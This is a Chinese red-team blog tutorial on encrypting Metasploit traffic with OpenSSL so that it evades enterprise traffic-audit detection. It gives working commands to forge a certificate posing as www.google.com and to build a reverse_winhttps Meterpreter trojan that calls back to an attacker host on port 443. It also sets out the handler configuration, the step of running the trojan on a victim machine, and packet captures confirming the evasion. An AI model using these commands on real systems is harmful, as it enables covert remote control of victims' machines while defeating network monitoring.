首页 > 其他分享 >红队隧道加密之MSF流量加密(二)

红队隧道加密之MSF流量加密(二)

时间:2022-11-26 14:01:07浏览次数:36  
标签:www google 加密 pem set MSF 红队 com

前言

如今大多数企业的内网都部署了流量审计服务, 用来专门分析流量特征, 比如后门特征和行为特征

若直接使用Metasploit对内网进行横向渗透, 其产生的流量会很容易被内网防护工具检测出来, 因此需对流量进行加密来绕过检测

这里介绍使用OpenSSL对MSF流量进行加密


演示步骤

1.OpenSSL创建证书SSL/TLS证书

在攻击机Kali输入如下命令生成www..google.com.pem证书文件

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt

image-20221107110103415


在当前目录查看生成的证书文件: cat www..google.com.pem

image-20221107111248924


2.生成MSF木马

在证书文件所在目录输入如下命令生成msf木马

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.47.134 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o msf.exe

image-20221107111434221


3.MSF开启监听

此处配置监听还需设置两个额外选项:

  • set handlersslcert: 设置处理程序时将使用的证书
  • set StagerVerifySSLCert: 设置接收到连接时执行SSL证书验证
msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_winhttps
payload => windows/meterpreter/reverse_winhttps
msf5 exploit(multi/handler) > set lhost 192.168.47.134
lhost => 192.168.47.134
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > set handlersslcert /root/www.google.com.pem
handlersslcert => /root/www.google.com.pem
msf5 exploit(multi/handler) > set stagerverifysslcert true
stagerverifysslcert => true

image-20221107170236469


访问https://192.168.47.134, 查看此网页的证书

1

1


4.受害机上线

将msf木马丢到受害机中运行, 随后msf服务端收到目标主机的meterpreter会话

注意: 经过测试, 操作系统为win7的受害机不会上线

image-20221107171548194


抓包分析

先在meterpreter会话命令行随便输条指令, 这里输入getuid

image-20221107172759201


随后打开wireshark抓取msf服务端与受害机之间的流量数据包, 可发现此流量使用了TLS协议加密

image-20221107172425839


追踪TCP流, 在tls加密前这里的数据是明文数据, 而现在是加密后的乱码数据

1

标签:www,google,加密,pem,set,MSF,红队,com
From: https://www.cnblogs.com/henry666/p/16927328.html

相关文章

  • 红队隧道加密之OpenSSL加密反弹Shell(一)
    前言在红队的后渗透阶段中,往往需要反弹shell进行下一步的内网横向渗透,而这种反弹shell大多数都有一个缺点,那就是其传输的流量都是明文传输,相当容易被内网的防火软......
  • 红队渗透靶场之Jarbas靶场(超详细!)
    靶场考察点1.Jenkis平台的漏洞利用Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进......
  • 非对称加密使用场景
    基于非对称加密实现接口的安全开放(openapi的实现)方案一:仅采用非对称加密方案二:采用非对称加密+对称加密iOSApp签名原理一、简单的签名原理:目的:保证每个App都是......
  • WPA加密wifi破解
    加密类型wep:不用了wpa:抓包破解wps:跑pin码破解参考文章:你们家用的无线路由器安全吗?【转载+防爆破经验分享】-『精品软件区』-吾爱破解-LCG-LSG|安卓破解|病......
  • JS请求参数加密破解
    源代码如下functionajax(){var_0x41e66d=_0xe062,_0x31cef8={'type':arguments[0x0][_0x41e66d(0x91)]||_0x41e66d(0x92),'url':arguments......
  • RSA加密与解密
    RSA加密算法是一种非对称加密算法,所谓非对称,就是加密与解密用的钥匙是不同的安装npminstalljsencrypt引入importJSEncryptfrom'jsencrypt/bin/jsencrypt';封......
  • 最近新的JS加密方法原来越多了
    直接上代码function_asdsdfvb(){}(function(){functiontDADZM(s){vard={"I":"d",";":",","0":"H","S":"h","Z":"m","}":"U","[":"B......
  • java工具类-jwt-RSA256算法加密
    加密数据(用户信息)packagetestJWT;/***@authorZRY*@version1.0*/publicclassUser{//用户idprivateintid;//用户名称private......
  • Pig4Cloud之jasypt 配置文件加密
    简介Jasypt是一个Java简易加密库,用于加密配置文件中的敏感信息,如数据库密码。jasypt库与springboot集成,在实际开发中非常方便。引入Jasypt依赖<dependency><groupI......
  • 红队渗透靶场之W1R3S靶场
    W1R3S考察知识nmap的基本使用目录爆破工具的使用CMS漏洞的利用Linux用户的简单提权W1R3S靶场搭建W1R3S靶场下载地址:https://download.vulnhub.com/w1r3s/w1r3s.......